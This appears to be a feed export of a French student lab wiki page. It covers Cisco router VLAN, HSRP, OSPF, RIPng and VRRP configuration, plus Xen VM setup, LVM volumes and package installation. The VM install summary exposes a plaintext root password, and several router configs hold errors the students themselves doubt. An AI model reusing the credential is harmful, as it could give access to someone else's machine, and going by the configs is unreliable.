Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51279</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51279"/>
				<updated>2019-11-28T10:23:39Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
